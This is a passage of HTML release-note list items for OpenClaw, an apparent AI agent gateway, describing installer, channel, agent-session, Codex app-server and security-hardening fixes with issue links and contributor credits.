<li>Telegram: preserve fenced code block languages through Markdown rendering so Telegram receives <code>language-*</code> code classes. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499735731" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85209" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85209/hovercard" href="https://github.com/openclaw/openclaw/pull/85209">#85209</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leno23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leno23">@leno23</a>.</li>
<li>Windows installer: run npm and Corepack command shims from a Windows-local directory so installs launched from WSL2 UNC paths do not fail before OpenClaw is installed.</li>
<li>Windows updates: roll back git-backed updates to the previous checkout when dependency install, build, UI build, or doctor repair fails.</li>
<li>Windows installer: persist user-local portable Git on PATH and activate the repo-pinned pnpm version for git-backed installs and updates.</li>
<li>Windows installer: bootstrap a user-local portable Node.js when native Windows has no Node and no winget, Chocolatey, or Scoop, so first-run installs can continue on raw hosts.</li>
<li>Windows installer: extract the downloaded portable Node.js directory with native <code>tar</code> before falling back to .NET zip extraction, avoiding PowerShell 5.1 archive and path-length failures.</li>
<li>fix(integrations): enforce channel read target allowlists [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4495452049" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84982" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84982/hovercard" href="https://github.com/openclaw/openclaw/pull/84982">#84982</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Agents/heartbeat: route single-owner <code>session.dmScope=main</code> direct-message exec and cron event wakes back to the agent main session so async completions no longer strand context in orphan direct-DM queues. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328109968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71581" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71581/hovercard" href="https://github.com/openclaw/openclaw/issues/71581">#71581</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4472187030" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83743" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83743/hovercard" href="https://github.com/openclaw/openclaw/pull/83743">#83743</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kaspre/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kaspre">@Kaspre</a>.</li>
<li>Agents/code-mode: expose outer code-mode <code>exec</code> source through the <code>command</code> hook alias with <code>toolKind</code>/<code>toolInputKind</code> discriminators so exec-shaped policies can distinguish code-mode cells. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466955914" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83483" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83483/hovercard" href="https://github.com/openclaw/openclaw/pull/83483">#83483</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kaspre/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kaspre">@Kaspre</a>.</li>
<li>Agents/code mode: return structured timeout and runtime-unavailable error codes for known worker failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465759055" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83389" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83389/hovercard" href="https://github.com/openclaw/openclaw/issues/83389">#83389</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466377793" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83444" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83444/hovercard" href="https://github.com/openclaw/openclaw/pull/83444">#83444</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kaspre/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kaspre">@Kaspre</a>.</li>
<li>QA-Lab: isolate multi-scenario suite workers when scenarios need startup config patches, preventing message-routing config from leaking into unrelated scenarios.</li>
<li>QA-Lab: make the commitments heartbeat-target-none scenario request an immediate heartbeat instead of waiting for the next scheduled heartbeat.</li>
<li>Codex/Plugin SDK: deliver Codex-native subagent completions through a generic harness task runtime so harness-backed plugins can mirror durable task lifecycle and completion delivery without Codex-specific SDK imports. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466398711" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83445" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83445/hovercard" href="https://github.com/openclaw/openclaw/pull/83445">#83445</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bryanpearson/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bryanpearson">@bryanpearson</a>.</li>
<li>Gateway CLI: surface local post-challenge connect assembly failures immediately instead of waiting for the wrapper timeout. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4290747635" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68944" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68944/hovercard" href="https://github.com/openclaw/openclaw/issues/68944">#68944</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4500376302" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85253" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85253/hovercard" href="https://github.com/openclaw/openclaw/pull/85253">#85253</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>Messages: strip unsupported web-search citation control markers from outbound replies before they reach WebChat or external channels. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499543395" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85193" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85193/hovercard" href="https://github.com/openclaw/openclaw/issues/85193">#85193</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499683212" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85204" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85204/hovercard" href="https://github.com/openclaw/openclaw/pull/85204">#85204</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>Agents/exec: treat denied exec approvals as terminal instead of feeding them back into agent follow-up work, and recognize Chinese stop phrases in abort handling. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4297018430" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69386" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69386/hovercard" href="https://github.com/openclaw/openclaw/issues/69386">#69386</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499556034" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85194" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85194/hovercard" href="https://github.com/openclaw/openclaw/pull/85194">#85194</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>CLI/agents: abort accepted Gateway-backed <code>openclaw agent</code> runs on SIGINT/SIGTERM so cron and supervisor timeouts do not leave remote agent work alive. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328934502" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71710" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71710/hovercard" href="https://github.com/openclaw/openclaw/issues/71710">#71710</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4482298414" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84381" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84381/hovercard" href="https://github.com/openclaw/openclaw/pull/84381">#84381</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kaspre/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kaspre">@Kaspre</a>.</li>
<li>Codex app-server: retry replay-safe stdio client-close turns once using structured failure metadata, while surfacing idle <code>turn/completed</code> timeouts instead of blindly replaying active shared-server turns. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VACInc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VACInc">@VACInc</a>.</li>
<li>Codex app-server: reject command overrides that embed Node or package-manager arguments and point users to <code>appServer.args</code>, so Windows startup avoids shell parsing failures. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4482924887" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84417" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84417/hovercard" href="https://github.com/openclaw/openclaw/pull/84417">#84417</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TurboTheTurtle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TurboTheTurtle">@TurboTheTurtle</a>.</li>
<li>Agents/Copilot: drop unsafe GitHub Copilot Responses reasoning replay items before send so Telegram direct sessions no longer fail on overlong replay IDs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499593497" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85197" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85197/hovercard" href="https://github.com/openclaw/openclaw/issues/85197">#85197</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499597293" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85198" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85198/hovercard" href="https://github.com/openclaw/openclaw/pull/85198">#85198</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galiniliev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galiniliev">@galiniliev</a>.</li>
<li>UI: add accessible tooltips to the topbar color-mode buttons so System, Light, and Dark choices are labeled on hover and focus. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499909774" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85227" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85227/hovercard" href="https://github.com/openclaw/openclaw/pull/85227">#85227</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>fix: constrain Windows task script names [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4497094133" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85064" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85064/hovercard" href="https://github.com/openclaw/openclaw/pull/85064">#85064</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Control UI: keep the chat session picker from hiding older or cross-agent configured conversations while preserving the bounded configured-agent refresh. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499767279" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85211" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85211/hovercard" href="https://github.com/openclaw/openclaw/pull/85211">#85211</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Agents/Anthropic: preserve unsafe integer tool-call input values in streamed Anthropic tool-use JSON, preventing Discord-style IDs from being rounded before dispatch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4078181831" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47229" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47229/hovercard" href="https://github.com/openclaw/openclaw/issues/47229">#47229</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463230716" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83063" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83063/hovercard" href="https://github.com/openclaw/openclaw/pull/83063">#83063</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leno23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leno23">@leno23</a>.</li>
<li>Agents/Codex: estimate tool-heavy prompt pressure at the LLM boundary before provider submission, so persistent sessions compact before overflowing context windows. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4506085390" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85541" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85541/hovercard" href="https://github.com/openclaw/openclaw/pull/85541">#85541</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fuller-stack-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fuller-stack-dev">@fuller-stack-dev</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Agents/hooks: wait for local one-shot CLI and Codex <code>agent_end</code> plugin hooks before process cleanup so terminal observability flushes reliably. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4495920076" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85007" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85007/hovercard" href="https://github.com/openclaw/openclaw/pull/85007">#85007</a>)</li>
<li>Providers/Google: preserve Gemini 3 cron <code>thinkingDefault: "low"</code> when stale catalog metadata says <code>reasoning:false</code>, so scheduled runs keep provider-supported thinking instead of downgrading to off. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499385810" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85185" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85185/hovercard" href="https://github.com/openclaw/openclaw/pull/85185">#85185</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>CLI/agents: allow <code>openclaw agent --session-key</code> to target explicit session keys, including agent-scoped legacy keys. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4498501242" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85121" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85121/hovercard" href="https://github.com/openclaw/openclaw/pull/85121">#85121</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kaspre/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kaspre">@Kaspre</a>.</li>
<li>Auto-reply/ACP: wait for same-channel block reply delivery before starting tool work, while still honoring ACP dispatch aborts so stopped turns do not wait on slow channel sends. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4471527952" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83722" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83722/hovercard" href="https://github.com/openclaw/openclaw/pull/83722">#83722</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IWhatsskill/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IWhatsskill">@IWhatsskill</a>.</li>
<li>Codex/ACP: mark required child-run completions that only report progress, omit a final deliverable, or fail requester delivery as blocked while preserving real final reports. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4498172824" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85110" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85110/hovercard" href="https://github.com/openclaw/openclaw/pull/85110">#85110</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IWhatsskill/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IWhatsskill">@IWhatsskill</a>.</li>
<li>Channels: treat bare abort messages such as <code>stop</code>, <code>abort</code>, and <code>wait</code> as immediate control commands in inbound debounce paths so stop requests are not delayed behind pending message coalescing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465477899" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83348" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83348/hovercard" href="https://github.com/openclaw/openclaw/pull/83348">#83348</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IWhatsskill/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IWhatsskill">@IWhatsskill</a>.</li>
<li>Channels/message tool: resolve configured external channel plugins during in-agent channel selection, so <code>openclaw agent --local</code> message-tool sends no longer report an available channel as unavailable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4496213314" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85022" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85022/hovercard" href="https://github.com/openclaw/openclaw/pull/85022">#85022</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kaspre/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kaspre">@Kaspre</a>.</li>
<li>Agents/heartbeat: honor group/channel <code>message_tool</code> visible-reply policy and model-specific Codex runtime config for scheduled heartbeat runs, so failed internal tool output stays private. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4501936678" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85310" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85310/hovercard" href="https://github.com/openclaw/openclaw/issues/85310">#85310</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4502712735" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85357" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85357/hovercard" href="https://github.com/openclaw/openclaw/pull/85357">#85357</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>Gateway/ACP: close child ACP sessions spawned via <code>sessions_spawn</code> when their parent session is reset or deleted, instead of leaving orphaned <code>claude-agent-acp</code> processes that accumulate and exhaust memory. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4290563726" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68916" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68916/hovercard" href="https://github.com/openclaw/openclaw/issues/68916">#68916</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499486658" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85190" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85190/hovercard" href="https://github.com/openclaw/openclaw/pull/85190">#85190</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</li>
<li>Codex app-server: block native execution paths when OpenClaw exec resolves to a node host while preserving the first-party CLI node binding path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4496082157" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85012" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85012/hovercard" href="https://github.com/openclaw/openclaw/issues/85012">#85012</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4506017461" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85534" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85534/hovercard" href="https://github.com/openclaw/openclaw/pull/85534">#85534</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Diagnostics: bound cleanup timeout detail logs, emit drop summaries when async diagnostic bursts exceed the queue cap, and surface async queue drops through diagnostic telemetry.</li>
<li>Agents/subagents: surface blocked child-run completions as errors instead of successful subagent finishes. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4426401117" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80886" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80886/hovercard" href="https://github.com/openclaw/openclaw/pull/80886">#80886</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TurboTheTurtle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TurboTheTurtle">@TurboTheTurtle</a>.</li>
<li>Context engines: fail closed with a descriptive error when the selected agent runtime cannot satisfy declared context-engine host requirements.</li>
<li>Agents/Pi: treat accepted embedded <code>sessions_spawn</code> child-session handoffs as terminal progress so parent turns no longer report false non-deliverable failures. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4496893143" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85054" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85054/hovercard" href="https://github.com/openclaw/openclaw/pull/85054">#85054</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>CLI/models: resolve <code>openclaw models set</code> aliases from the runtime config while keeping authored aliases ahead of runtime-only defaults. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464921339" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83262" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83262/hovercard" href="https://github.com/openclaw/openclaw/pull/83262">#83262</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IWhatsskill/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IWhatsskill">@IWhatsskill</a>.</li>
<li>Doctor: show personal Codex CLI asset notices as info instead of warnings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4492410818" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84859" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84859/hovercard" href="https://github.com/openclaw/openclaw/issues/84859">#84859</a>.</li>
<li>WhatsApp: update Baileys to <code>7.0.0-rc13</code> and drop the obsolete logger type patch.</li>
<li>CLI/update: pre-pack GitHub/git package update targets before the staged npm install, restoring <code>openclaw update --tag main</code> for one-off package updates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4434938350" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81296" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/81296/hovercard" href="https://github.com/openclaw/openclaw/pull/81296">#81296</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fuller-stack-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fuller-stack-dev">@fuller-stack-dev</a>.</li>
<li>Gateway: mirror successful same-source message-tool sends into session transcripts so delivered replies stay in later history/context. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4492092367" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84837" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84837/hovercard" href="https://github.com/openclaw/openclaw/pull/84837">#84837</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iFiras-Max1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iFiras-Max1">@iFiras-Max1</a>.</li>
<li>Media generation: keep image, music, and video completion delivery from duplicating or losing task ownership when generated media finishes through active session replies. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4474791588" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84006" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84006/hovercard" href="https://github.com/openclaw/openclaw/pull/84006">#84006</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fuller-stack-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fuller-stack-dev">@fuller-stack-dev</a>.</li>
<li>CLI/doctor: remove stale bundled plugin load paths from old versioned OpenClaw package roots after pnpm/npm upgrades. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4183233605" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58626" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58626/hovercard" href="https://github.com/openclaw/openclaw/issues/58626">#58626</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solink7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solink7">@solink7</a>.</li>
<li>Infra/json: retry transient <code>File changed during read</code> races while loading JSON state so config and state reads recover instead of failing the turn. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4480467537" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84285" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84285/hovercard" href="https://github.com/openclaw/openclaw/pull/84285">#84285</a>)</li>
<li>Plugins/providers: fail closed for workspace provider plugins during setup-mode discovery unless explicitly trusted, preventing untrusted workspace plugin code from running during provider setup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4430383114" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81069" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/81069/hovercard" href="https://github.com/openclaw/openclaw/pull/81069">#81069</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mmaps/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mmaps">@mmaps</a>.</li>
<li>Providers/Ollama: resolve configured Ollama Cloud <code>OLLAMA_API_KEY</code> markers to the real discovery key so cloud provider entries keep authenticated model catalog access. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4496517336" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85037" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85037/hovercard" href="https://github.com/openclaw/openclaw/pull/85037">#85037</a>)</li>
<li>Discord: keep persistent component registry fallback warnings actionable by forwarding structured error and cause metadata through the runtime logger. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4478478934" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84185" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84185/hovercard" href="https://github.com/openclaw/openclaw/issues/84185">#84185</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4478496859" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84190" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84190/hovercard" href="https://github.com/openclaw/openclaw/pull/84190">#84190</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100menotu001/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100menotu001">@100menotu001</a>.</li>
